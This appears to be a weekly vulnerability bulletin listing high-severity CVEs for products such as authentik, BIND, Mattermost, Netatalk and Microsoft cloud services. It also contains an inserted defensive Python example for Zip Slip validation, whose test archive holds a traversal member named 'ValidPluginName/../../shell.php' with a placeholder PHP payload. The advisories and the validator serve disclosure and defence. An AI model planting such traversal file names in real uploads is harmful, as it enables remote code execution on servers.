goauthentik–authentik authentik is an open-source identity provider. Versions 2025.12.4 and prior, and versions 2026.2.0-rc1 through 2026.2.2 were vulnerable to Authentication Bypass through SAML NameID XML Comment Injection. Due to how authentik extracted the NameID value from a SAML assertion, it was possible for an attacker to trick authentik into only seeing a part of the NameID value, potentially allowing an attacker to gain access to other accounts. This issue could be exploited on an authentik instance with a SAML Source, where the attacker had an account on the SAML Source and the ability to modify their NameID value (commonly username or E-mail), and XML Signing was enabled. The attacker could modify the SAML assertion given to authentik by injecting a comment within the NameID value, which effectively truncated the NameID value to the snippet before the comment, and gave the attacker access to any user account. This issue has been fixed in versions 2025.12.5 and 2026.2.3. 2026-05-20 8.7 CVE-2026-40165
goauthentik–authentik authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, the PATCH /api/v3/core/users/{pk}/ API allows a caller with change_user on a target user to assign arbitrary groups through UserSerializer, including groups with is_superuser=True, without requiring enable_group_superuser, leading to privilege escalation. This bypasses the stricter permission model enforced in group-management paths and enables delegated user-management permissions to escalate target users to administrator-equivalent privilege. Users with permissions to update groups or permissions to update users are able to add themselves or other users they have permissions on to groups which have superuser permissions. This issue has been fixed in versions 2025.12.5 and 2026.2.3. 2026-05-22 8.1 CVE-2026-40172
H3C–Magic B0 A vulnerability was found in H3C Magic B0 up to 100R002. This affects the function Edit_BasicSSID_5G of the file /goform/aspForm. Performing a manipulation of the argument param results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9393
harmistechnology–Ek Rishta Joomla! Component Ek Rishta 2.10 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cid parameter. Attackers can send GET requests to the user_detail view with malicious cid values containing SQL commands to extract sensitive database information. 2026-05-23 8.2 CVE-2018-25348
harmistechnology–EkRishta Joomla! Component EkRishta 2.10 contains an error-based SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the username parameter. Attackers can submit POST requests to the login endpoint with SQL injection payloads in the username field to extract database information including user credentials and system details. 2026-05-23 8.2 CVE-2018-25351
hestiacp–hestiacp HestiaCP versions 1.9.0 through 1.9.4 contain a deserialization vulnerability in the web terminal component caused by a session format mismatch between PHP and Node.js that allows unauthenticated remote attackers to achieve root-level code execution. Attackers can inject crafted data into HTTP headers that are processed by the PHP session handler but incorrectly deserialized by the Node.js web terminal component as trusted session values, resulting in arbitrary command execution on systems with the web terminal feature enabled. 2026-05-19 10 CVE-2026-43633
hestiacp–hestiacp HestiaCP versions 1.2.0 through 1.9.4 contain an IP spoofing vulnerability that allows unauthenticated remote attackers to bypass authentication security controls by supplying an arbitrary IP address in the CF-Connecting-IP HTTP header without verifying the request originated from Cloudflare’s network. Attackers can exploit this to circumvent fail2ban brute-force protection, bypass per-user IP allowlists, and poison authentication audit logs by spoofing trusted IP addresses on each request. 2026-05-19 7.5 CVE-2026-43634
Honeywell International Inc.–Control Network Module (CNM) Honeywell Control Network Module (CNM) contains command injection vulnerability in the web interface. An attacker could exploit this vulnerability via command delimiters, potentially resulting in Remote Code Execution (RCE). 2026-05-21 9.1 CVE-2026-5433
iina–iina IINA before 1.4.3 contains a user-assisted command execution vulnerability that allows remote attackers to execute arbitrary commands by supplying malicious mpv_-prefixed query parameters through the iina://open custom URL scheme handler. Attackers can deliver a crafted URL via a browser that passes unvalidated mpv_options/input-commands parameters into the mpv runtime, causing arbitrary command execution as the current macOS user upon approval of the browser protocol prompt without requiring a valid media file. 2026-05-21 8.8 CVE-2026-47114
ISC–BIND 9 BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets. Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments. This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. 2026-05-20 7.5 CVE-2026-3039
ISC–BIND 9 A use-after-free vulnerability exists within the DNS-over-HTTPS implementation. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.0 through 9.18.48 and 9.18.11-S1 through 9.18.48-S1 are NOT affected. 2026-05-20 7.4 CVE-2026-3593
ISC–BIND 9 Multiple flaws have been identified in `named` related to the handling of DNS messages whose CLASS is not Internet (`IN`) – for example, `CHAOS` or `HESIOD`, or DNS messages that specify meta-classes (`ANY` or `NONE`) in the question section. Specially crafted requests reaching the affected code paths – recursion, dynamic updates (`UPDATE`), zone change notifications (`NOTIFY`), or processing of `IN`-specific record types in non-`IN` data – can cause assertion failures in `named`. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. 2026-05-20 7.5 CVE-2026-5946
ISC–BIND 9 Undefined behavior may result due to a race condition leading to a use-after-free violation. If BIND receives an incoming DNS message signed with SIG(0), it begins work to validate that signature. If, during that validation, the “recursive-clients” limit is reached (as would occur during a query flood), and that same DNS message is discarded per the limit, there is a brief window of time while the SIG(0) validation may attempt to read the now-discarded DNS message. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.28 through 9.18.49 and 9.18.28-S1 through 9.18.49-S1 are NOT affected. 2026-05-20 7.5 CVE-2026-5947
itsourcecode–Electronic Judging System A vulnerability has been found in itsourcecode Electronic Judging System 1.0. This affects an unknown part of the file /intrams/admin/login.php. The manipulation of the argument Username leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. 2026-05-24 7.3 CVE-2026-9383
ItzCrazyKns–Vane A flaw has been found in ItzCrazyKns Vane up to 1.12.1. This vulnerability affects unknown code of the file src/app/api/providers/route.ts of the component Model Provider API. This manipulation of the argument baseURL causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. 2026-05-24 7.3 CVE-2026-9372
ivanti–Secure Access Client An improper certificate validation vulnerability in Ivanti Secure Access Client before 22.8R6 allows a remote unauthenticated attacker to execute arbitrary code. 2026-05-22 8.8 CVE-2026-8992
jarrodwatts–claude-hud Claude HUD through 0.0.12, patched in commit 234d9aa, contains a command injection vulnerability that allows local attackers to execute arbitrary commands by manipulating the COMSPEC environment variable. Attackers can set COMSPEC to an arbitrary binary path before claude-hud performs its version check, causing execFile() to execute the attacker-supplied executable with cmd.exe arguments, resulting in arbitrary code execution on Windows systems. 2026-05-18 7.8 CVE-2026-47092
kovidgoyal–kitty Kitty is a cross-platform GPU based terminal. In versions 0.46.2 and below, the handle_compose_command() function in kitty/graphics.c performs bounds validation on composition offsets using unsigned 32-bit arithmetic that is subject to integer wrapping, potentially leading to Heap Buffer Over-Read/Write. An attacker who can write escape sequences to a kitty terminal (e.g., via a malicious file, SSH login banner, or piped content) can supply crafted x_offset/y_offset values that pass the bounds check after wrapping but cause massive out-of-bounds heap memory access in compose_rectangles(). No user interaction is required. No non-default configuration is required. The attacker only needs the ability to produce output in a kitty terminal window. This issue has been fixed in version 0.47.0. 2026-05-19 9.9 CVE-2026-33642
kovidgoyal–kitty Kitty is a cross-platform GPU based terminal. Versions 0.46.2 and below contain a heap buffer overflow in load_image_data() that allows any process which can write to the terminal’s stdin to crash kitty immediately. The vulnerability is triggered by a single APC graphics protocol command with a PNG format declaration (f=100) whose payload exceeds twice the initial buffer capacity. The overflow is attacker-controlled in both length and content, causing DoS and potentially escalating to RCE. This issue has been fixed in version 0.47.0. 2026-05-19 7.5 CVE-2026-33633
langgenius–dify Dify version 1.14.1 and prior contains an authorization bypass vulnerability that allows authenticated editor users to set and enable trace configurations for any application regardless of tenant ownership. Attackers can exploit missing tenant ownership checks in the trace configuration endpoints to redirect all messages and responses from victim applications to attacker-controlled LLM trace providers. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. 2026-05-18 7.4 CVE-2026-41947
langgenius–dify Dify version 1.14.1 and prior contain a path traversal vulnerability that allows authenticated users to manipulate requests forwarded to the Plugin Daemon’s internal REST API by exploiting insufficient URL path sanitization. Attackers can traverse out of their authorized tenant path using unencoded dot sequences in task identifiers or manipulated filename parameters to access internal endpoints such as debug interfaces, requiring only knowledge of the victim tenant’s UUID. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. 2026-05-18 7.7 CVE-2026-41948
laurent22–joplin Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions prior to 3.5.7 contain a path traversal vulnerability in the importer which allows overwriting arbitrary files on disk. The OneNote converter does not sanitize the names of embedded files before writing them to disk. As a result, it’s possible for an attacker to create a malicious .one file that includes file names containing ../../, that are then interpreted as part of the target path when extracting attachments from the .one file. This issue has been patched in version 3.5.7. 2026-05-18 8.2 CVE-2026-22810
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: crypto: pcrypt – Fix handling of MAY_BACKLOG requests MAY_BACKLOG requests can return EBUSY. Handle them by checking for that value and filtering out EINPROGRESS notifications. 2026-05-19 9.8 CVE-2026-43493
LizardByte–Sunshine Sunshine is a self-hosted game stream host for Moonlight. In versions prior to 2026.516.143833, the client-certificate authentication can be bypassed because of how OpenSSL verification results are handled. In src/crypto.cpp, the custom verify callback treats X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY, X509_V_ERR_CERT_NOT_YET_VALID, and X509_V_ERR_CERT_HAS_EXPIRED as success. This can allow an untrusted certificate to pass authentication and access protected HTTPS endpoints. This issue has been fixed in version 2026.516.143833. 2026-05-22 9.8 CVE-2026-32253
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check the integration URL for path traversal, which allows a malicious authenticated user to call an arbitrary API via the system admin Mattermost auth token using path traversal in the integration action URL. Mattermost Advisory ID: MMSA-2026-00640 2026-05-21 8 CVE-2026-4858
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields before including them in support packet generation, which allows a Mattermost System Admin or any party with access to a support packet to obtain sensitive credentials in plaintext via downloading a support packet from the System Console. Mattermost Advisory ID: MMSA-2026-00607 2026-05-18 8.7 CVE-2026-6346
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to properly validate msgpack-encoded WebSocket frames before memory allocation, which allows an unauthenticated remote attacker to crash the server process and cause a full service outage for all users via a crafted binary WebSocket message sent to the public WebSocket endpoint. Mattermost Advisory ID: MMSA-2026-00647 2026-05-22 7.5 CVE-2026-5740
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields in the Mattermost Calls plugin, which allows an attacker with access to a support packet to obtain TURN server credentials via the plaintext values present in the exported plugin configuration. Mattermost Advisory ID: MMSA-2026-00605 2026-05-18 7.6 CVE-2026-6347
MediaArea–MediaInfoLib MediaArea MediaInfoLib Channel Splitting heap-based buffer overflow vulnerability 2026-05-20 7.8 CVE-2026-22554
MediaArea–MediaInfoLib MediaArea MediaInfoLib LXF element parsing heap-based buffer overflow vulnerability 2026-05-21 7.8 CVE-2026-28764
memcached–memcached In memcached before 1.6.42, username data for SASL password database authentication has a timing side channel because a loop exits as soon as a valid username is found by sasl_server_userdb_checkpass. 2026-05-20 8.1 CVE-2026-47783
memcached–memcached In memcached before 1.6.42, password data for SASL password database authentication has a timing side channel because memcmp is used by sasl_server_userdb_checkpass. 2026-05-20 8.1 CVE-2026-47784
Mesalvo–Meona Client Launcher Component Improper Control of Generation of Code (‘Code Injection’) vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables code execution on other users’ systems. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. 2026-05-20 9 CVE-2026-22314
Mesalvo–Meona Client Launcher Component Improper Access Control vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables a normal user gaining access to the admin panel. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. 2026-05-20 7.8 CVE-2026-0856
Mesalvo–Meona Client Launcher Component Incorrect Privilege Assignment vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables the export of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. 2026-05-20 7.2 CVE-2026-22315
metaphorcreations–Ditty Responsive News Tickers, Sliders, and Lists The Ditty – Responsive News Tickers, Sliders, and Lists plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.1.65. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to retrieve the full item content of non-public Dittys – including drafts, pending, scheduled, and disabled entries – by enumerating integer post IDs against the ditty_init AJAX endpoint. Unlike the non-AJAX init() counterpart, init_ajax() does not verify that the requested Ditty has a ‘publish’ post status before loading and returning its items, allowing content that administrators explicitly withheld from public view to be extracted. 2026-05-22 7.5 CVE-2026-9011
Microsoft–Azure Local Improper authentication in Azure Local Disconnected Operations allows an unauthorized attacker to elevate privileges over a network. 2026-05-18 10 CVE-2026-42822
Microsoft–Azure Orbital Spatio Unrestricted upload of file with dangerous type in Azure Orbital Spatio allows an unauthorized attacker to execute code over a network. 2026-05-22 10 CVE-2026-40412
Microsoft–Azure Privileged Identity Management (PIM) Authorization bypass through user-controlled key in Azure Privileged Identity Management (PIM) allows an authorized attacker to elevate privileges over a network. 2026-05-22 8.8 CVE-2026-35430
Microsoft–Azure Resource Manager Improper authentication in Azure Resource Manager (ARM) allows an unauthorized attacker to elevate privileges over a network. 2026-05-22 10 CVE-2026-47280
Microsoft–Azure Stack HCI Improper input validation in Azure Compute Gallery allows an authorized attacker to disclose information over a network. 2026-05-22 7.7 CVE-2026-26147
Microsoft–Azure Virtual Network Gateway Improper input validation in Azure Virtual Network Gateway allows an authorized attacker to execute code over a network. 2026-05-22 9.9 CVE-2026-40411
Microsoft–Microsoft 365 Copilot for iOS Improper neutralization of special elements used in a command (‘command injection’) in Microsoft Copilot allows an unauthorized attacker to perform tampering over a network. 2026-05-22 9.3 CVE-2026-41090
Microsoft–Microsoft Edge (Chromium-based) Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2026-05-18 8.8 CVE-2026-45495
Microsoft–Microsoft Entra Origin validation error in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network. 2026-05-22 10 CVE-2026-42901
Microsoft–Microsoft Entra Authentication bypass using an alternate path or channel in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network. 2026-05-22 9.1 CVE-2026-33843
Microsoft–Microsoft Global Secure Access (GSA) Improper privilege management in Azure Entra ID allows an unauthorized attacker to elevate privileges over a network. 2026-05-22 7.5 CVE-2026-23663
Microsoft–Microsoft Malware Protection Engine Heap-based buffer overflow in Microsoft Defender allows an unauthorized attacker to execute code over a network. 2026-05-20 8.1 CVE-2026-45584
Microsoft–Microsoft Malware Protection Engine Improper link resolution before file access (‘link following’) in Microsoft Defender allows an authorized attacker to elevate privileges locally. 2026-05-20 7.8 CVE-2026-41091
Microsoft–Microsoft Planetary Computer Pro (GeoCatalog) Deserialization of untrusted data in Microsoft Planetary Computer Pro allows an unauthorized attacker to disclose information over a network. 2026-05-22 10 CVE-2026-41104
Microsoft–Microsoft Power Pages Improper neutralization of special elements used in a command (‘command injection’) in Microsoft Power Pages allows an unauthorized attacker to execute code over a network. 2026-05-22 10 CVE-2026-23652
Microsoft–Microsoft SharePoint Enterprise Server 2016 Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. 2026-05-22 8.8 CVE-2026-45659
Microsoft–Windows Admin Center in Azure Portal Improper link resolution before file access (‘link following’) in Azure Portal Windows Admin Center allows an authorized attacker to elevate privileges locally. 2026-05-20 7.8 CVE-2026-42834
Motorola–Phones An improper authentication vulnerability was discovered in the Motorola Factory Test component (com.motorola.motocit). The application contained a reference to a writable file descriptor in external storage which could be used by third party apps running on the device to open a TCP server, exposing sensitive permissions and data. This could allow a local attacker to bypass permission checks and access protected device settings. 2026-05-19 8.4 CVE-2026-5804
mullvad–mullvadvpn-app Mullvad VPN is a VPN client app for desktop and mobile. When using macOS with versions 2026.1 and below, Mullvad VPN may allow local privilege escalation during installation or upgrade. The installer package executes binaries from /Applications/Mullvad VPN.app without verifying if the bundle is attacker-controlled or that the path is the legitimate Mullvad application. A user in the admin group can pre-place a crafted application bundle at that location and may be able to achieve code execution as root. Since the issue only affected the installer, there is no immediate need for users to update if they are already running an older version. This issue has been fixed in version 2026.2-beta1. 2026-05-19 7.3 CVE-2026-32323
n/a–exifreader This affects versions of the package exifreader before 4.39.0. A crafted image containing an ICC mluc tag can set an attacker-controlled record count together with a zero record size. During parsing, ExifReader repeatedly processes the same record and appends entries to an array without sufficient bounds validation, causing excessive memory growth. In applications that parse attacker-supplied images, this may lead to denial of service through memory exhaustion. 2026-05-19 7.5 CVE-2026-8813
n/a–lwIP A vulnerability was found in lwIP up to 2.2.1. Affected is the function snmp_parse_inbound_frame of the file src/apps/snmp/snmp_msg.c of the component snmpv3 USM Handler. Performing a manipulation of the argument msgAuthenticationParameters results in stack-based buffer overflow. The attack may be initiated remotely. The patch is named 0c957ec03054eb6c8205e9c9d1d05d90ada3898c. It is suggested to install a patch to address this issue. 2026-05-18 9.8 CVE-2026-8836
n/a–shell-quote shell-quote’s `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field was backslash-escaped character by character using `/(.)/g`, which in JavaScript does not match line terminators (`\n`, `\r`, U+2028, U+2029). A line terminator in `.op` therefore passed through unescaped into the output; POSIX shells treat a literal newline as a command separator, so any content after it would execute as a second command. The vulnerable code path is reachable in two ways: (1) direct construction of `{ op: '…\n…' }` from external input, and (2) via `parse(cmd, envFn)` when `envFn` returns object tokens whose `.op` is attacker-influenced. Both are documented API surface. Fixed by replacing the per-character escape with strict shape validation: `.op` must match the parser’s control-operator allowlist; `{ op: 'glob', pattern }` validates `pattern` and forbids line terminators; `{ comment }` validates `comment` and forbids line terminators; any other object shape throws `TypeError`. 2026-05-22 8.1 CVE-2026-9277
NeoRazorX–facturascripts FacturaScripts is an open source accounting and invoicing software. Versions 2026 and below contain a critical vulnerability in the Plugins::add() function. The system fails to properly validate the file paths within uploaded ZIP archives. This allows an attacker to perform a Zip Slip attack, leading to Arbitrary File Write and Remote Code Execution (RCE) by overwriting sensitive .php files outside the designated plugins directory. The vulnerability is located in Plugins.php. While the testZipFile function attempts to validate that the ZIP contains only one root folder, it does not sanitize or validate the individual file paths within that folder. An attacker can bypass this check by naming a file ValidPluginName/../../shell.php. The explode function will see ValidPluginName as the root folder, satisfying the count($folders) != 1 check. However, during extraction, the ../../ sequence triggers a path traversal, allowing the file to be written anywhere the web server has write permission, including the document root. This issue is fixed in version 2026.1. 2026-05-18 7.2 CVE-2026-27891
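The member-path validation that a root-folder count alone does not provide, as an added Python example that is not FacturaScripts code: a first-component check of the kind described above accepts `ValidPluginName/../../shell.php`, whereas checking every path component of every member, then re-resolving each target against the plugins directory at extraction time, rejects it. The archive contents and the `plugin.ini` name are constructed for the example.

```python
import io
import os
import posixpath
import tempfile
import zipfile


def naive_root_folders(names):
    """Mimics a check that only looks at the first path component of each member."""
    return {n.split("/")[0] for n in names}


def validate_plugin_zip(zip_bytes: bytes) -> str:
    """Return the single root folder name, or raise ValueError for any unsafe member."""
    roots = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith("/") or "\\" in name or "\x00" in name:
                raise ValueError(f"rejected {name!r}: absolute path or forbidden character")
            parts = name.rstrip("/").split("/")
            # Every component is inspected, not just the first one.
            if any(p in ("", ".", "..") for p in parts):
                raise ValueError(f"rejected {name!r}: traversal or empty path component")
            if posixpath.normpath(name) != name.rstrip("/"):
                raise ValueError(f"rejected {name!r}: non-canonical path")
            roots.add(parts[0])
    if len(roots) != 1:
        raise ValueError(f"expected exactly one root folder, got {sorted(roots)}")
    return roots.pop()


def extract_plugin(zip_bytes: bytes, plugins_dir: str) -> list:
    """Extract after validation, re-checking each resolved target against plugins_dir."""
    validate_plugin_zip(zip_bytes)
    base = os.path.realpath(plugins_dir)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(base, *info.filename.split("/")))
            # Second line of defence: the resolved path must stay under the plugins dir.
            if os.path.commonpath([base, target]) != base:
                raise ValueError(f"refusing to write outside {base}: {target}")
            if info.filename.endswith("/"):
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.relpath(target, base))
    return written


def make_zip(entries) -> bytes:
    """Constructed archive: entries are (member name, content)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries:
            zf.writestr(name, content)   # writestr stores the name verbatim, ".." included
    return buf.getvalue()


BENIGN_ZIP = make_zip([("ValidPluginName/plugin.ini", "name = ValidPluginName\n")])
ZIPSLIP_ZIP = make_zip([("ValidPluginName/plugin.ini", "name = ValidPluginName\n"),
                        ("ValidPluginName/../../shell.php", "<?php /* attacker payload */ ?>")])


def zipslip_is_rejected() -> bool:
    try:
        validate_plugin_zip(ZIPSLIP_ZIP)
    except ValueError:
        return True
    return False


def demo_extract() -> list:
    with tempfile.TemporaryDirectory() as tmp:
        return extract_plugin(BENIGN_ZIP, tmp)
```

Note that `naive_root_folders` returns a single root for the malicious archive, which is the bypass in one line; the realpath check in `extract_plugin` is kept even though validation already passed, so a future change to the name check cannot silently reopen the traversal.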
Netatalk–Netatalk A heap-based buffer overflow in the CNID daemon comm_rcv() function in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code with escalated privileges or cause a denial of service. 2026-05-21 9.9 CVE-2026-44050
Netatalk–Netatalk An SQL injection vulnerability in the MySQL CNID backend in Netatalk 3.1.0 through 4.4.2 allows a remote authenticated attacker to obtain unauthorized access to data, modify data, or cause a denial of service. 2026-05-21 8.8 CVE-2026-44047
Netatalk–Netatalk A stack-based buffer overflow via UCS-2 type confusion in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service. 2026-05-21 8.8 CVE-2026-44048
Netatalk–Netatalk An improper link resolution vulnerability in Netatalk 3.0.2 through 4.4.2 allows a remote authenticated attacker to read arbitrary files or overwrite arbitrary files via attacker-controlled symlink creation. 2026-05-21 8.1 CVE-2026-44051
Netatalk–Netatalk An out-of-bounds write due to improper null termination in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character data. 2026-05-21 7.5 CVE-2026-44049
Netatalk–Netatalk Netatalk 2.1.0 through 4.4.2 inserts LDAP simple-bind passwords into log output in cleartext, which allows an attacker with access to the log files to obtain LDAP credentials. 2026-05-21 7.5 CVE-2026-44052
Netatalk–Netatalk Netatalk 1.5.0 through 4.2.2 uses a broken cryptographic algorithm in the DHCAST128 UAM, which allows a remote attacker to obtain authentication credentials or impersonate a user via cryptanalytic attack. 2026-05-21 7.4 CVE-2026-44053
Netatalk–Netatalk A logic error involving bitwise OR operations in Netatalk 3.1.4 through 4.4.2 allows a remote authenticated attacker to inject OS commands and execute arbitrary code. 2026-05-21 7.5 CVE-2026-44055
Netatalk–Netatalk An integer underflow in dsi_writeinit() in Netatalk 1.5.0 through 4.4.2 allows a remote unauthenticated attacker to cause a denial of service via a crafted DSI write request. 2026-05-21 7.5 CVE-2026-44060
Netatalk–Netatalk A missing output length bounds check in pull_charset_flags() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character set data. 2026-05-21 7.5 CVE-2026-44062
Netatalk–Netatalk An out-of-bounds read in ASP session ID handling in Netatalk 1.3 through 4.4.2 allows an adjacent network attacker to obtain limited information or cause a denial of service via a crafted ASP request. 2026-05-21 7.1 CVE-2026-44064
Netatalk–Netatalk Multiple heap out-of-bounds reads in the Spotlight RPC unmarshalling code in Netatalk 3.1.0 through 4.4.2 allow a remote authenticated attacker to obtain sensitive information or cause a minor service disruption. 2026-05-21 7.1 CVE-2026-44066
Netatalk–Netatalk Incomplete sanitization of extended attribute (EA) path components in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to write to files outside the intended metadata namespace via crafted EA names. 2026-05-21 7.6 CVE-2026-44068
nimiq–core-rs-albatross nimiq-blockchain provides persistent block storage for Nimiq’s Rust implementation. In versions 1.3.0 and below, a malicious network peer can crash any Nimiq full node by publishing a crafted Kademlia DHT record. The maliciously crafted record would contain a TaggedSigned<ValidatorRecord, KeyPair> with a signature field whose byte length is not exactly 64 in order to cause a crash. When the victim node’s DHT verifier calls TaggedSigned::verify, execution reaches Ed25519Signature::from_bytes(sig).unwrap() in the TaggedPublicKey implementation for Ed25519PublicKey. The from_bytes call fails because ed25519_zebra::Signature::try_from rejects slices not 64 bytes, and the unwrap() panics. The BLS TaggedPublicKey implementation correctly returns false on error; only the Ed25519 implementation panics. This issue has been fixed in version 1.4.0. 2026-05-20 7.5 CVE-2026-40092
NousResearch–hermes-agent A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 7.3 CVE-2026-9350
NousResearch–hermes-agent A security vulnerability has been detected in NousResearch hermes-agent up to 2026.4.23. Impacted is an unknown function of the file agent/skills_guard.py of the component Skills Guard Multi-Word Prompt Handler. The manipulation of the argument THREAT_PATTERNS leads to injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 7.3 CVE-2026-9353
NousResearch–hermes-agent A vulnerability was found in NousResearch hermes-agent 2026.4.23. The impacted element is the function _scan_context_content of the file agent/prompt_builder.py. The manipulation results in injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 7.3 CVE-2026-9366
NousResearch–hermes-agent A vulnerability was determined in NousResearch hermes-agent up to 5157f5427f19488b31c6fdebbacd15d798ce7f63. This affects the function detect_dangerous_command of the file tools/approval.py of the component terminal_tool. This manipulation causes os command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 7.3 CVE-2026-9367
NousResearch–hermes-agent A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This impacts the function execute_code of the file tools/code_execution_tool.py of the component Environment Variable Handler. Such manipulation leads to sandbox issue. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 7.3 CVE-2026-9368
nukeviet–nukeviet NukeViet CMS is a multi Content Management System. Versions 4.5.07 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability caused by insufficient server-side input sanitization in the Request class. The application relies primarily on client-side filtering to sanitize HTML tags and attributes in user-submitted content, which can be bypassed by intercepting and modifying HTTP requests directly (e.g., using Burp Suite). An attacker can inject malicious payloads which are stored server-side and executed in the browser of any user who views the content. Anyone viewing user-submitted content (such as administrators and moderators reviewing contact messages or comments) is impacted, and the vulnerability can be exploited by any anonymous visitor without authentication, with the Contact module used only as a proof of concept. Potential consequences include session hijacking through cookie theft, unauthorized actions performed under the victim’s identity, defacement or redirection to phishing pages, and phishing attacks via manipulated email notifications. This issue has been fixed in version 4.5.08. If developers are unable to upgrade immediately, they should work around this issue by implementing server-side HTML sanitization in the Request class to strip or encode dangerous tags and attributes (e.g., <iframe>, srcdoc, event handlers like onerror/onload), enforcing a Content Security Policy (CSP) to restrict inline script execution, and setting cookies with the HttpOnly flag to mitigate cookie theft via XSS. 2026-05-22 8.7 CVE-2026-41147
NVIDIA–BioNeMo Framework NVIDIA BioNeMo Core for Linux contains a vulnerability where a user could cause a path traversal by loading a malicious file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. 2026-05-20 8.8 CVE-2026-24217
NVIDIA–BioNeMo Framework NVIDIA BioNeMo for Linux contains a vulnerability where a user could cause a deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. 2026-05-20 7.8 CVE-2026-24216
NVIDIA–DGX Spark NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or attacker-in-the-middle attacks. A successful exploit of this vulnerability might lead to code execution, data tampering, escalation of privileges, information disclosure, and denial of service. 2026-05-20 8.1 CVE-2026-24218
